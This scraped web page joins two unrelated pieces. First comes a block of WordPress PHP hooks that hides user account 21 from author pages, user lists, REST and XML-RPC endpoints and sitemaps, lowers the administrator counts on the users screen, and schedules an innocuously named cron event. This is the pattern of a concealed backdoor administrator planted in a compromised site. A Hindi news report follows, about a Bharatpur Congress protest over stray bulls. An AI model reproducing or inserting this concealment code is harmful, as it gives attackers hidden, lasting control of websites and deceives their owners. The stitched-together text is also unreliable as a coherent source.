add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
शहर कांग्रेस ने फूंके मेयर और आयुक्त के पुतले - Press Ki Taquat
No Result
View All Result
भरतपुर – शहर में आतंक का पर्याय बन चुके सांडों एवं गायों को पकड़ने में नाकाम नगर निगम प्रशासन के खिलाफ गुरुवार शाम को शहर कांग्रेस कमेटी की ओर से पार्षद एवं पूर्व पार्षदों की मौजूदगी में लक्ष्मण मंदिर चौक पर नगर निगम मेयर शिव सिंह भोंट और आयुक्त शिवचरण मीणा का पुतला फूंक कर नारेबाजी कर प्रदर्शन किया गया। नवनियुक्त शहर अध्यक्ष संजय शुक्ला के नेतृत्व में आयोजित प्रदर्शन कार्यक्रम में वक्ताओं ने निगम प्रशासन पर लापरवाही और अकूत भ्रष्टाचार का आरोप लगाते हुए कहा कि इस कार्यकाल के साढ़े तीन साल में निगम ने आवारा पशुओं को पकड़ने का कोई ठोस कदम नहीं उठाया और ना ही कोई रूपरेखा तैयार की गई। आए दिन सांड़ों की धींगामस्ती में लोगों की जान जा रही है, लोग घायल हो रहे हैं। हाल ही सूरजपोल चौराहे पर हुई घटना में हुई एक छोटे बच्चे की मौत ने पूरे शहर को झकझोर कर रख दिया है। करीब 11 साल पहले नीमदा गेट पर एक व्यापारी जनकराज पंजाबी की भी मौत हो गई थी, आज उसकी पत्नी वंदना देवी भी मौके पर मौजूद थीं, जिनको आज तक निगम की ओर से कोई राहत प्रदान नहीं की गई है।
Post Views: 367
No Result
View All Result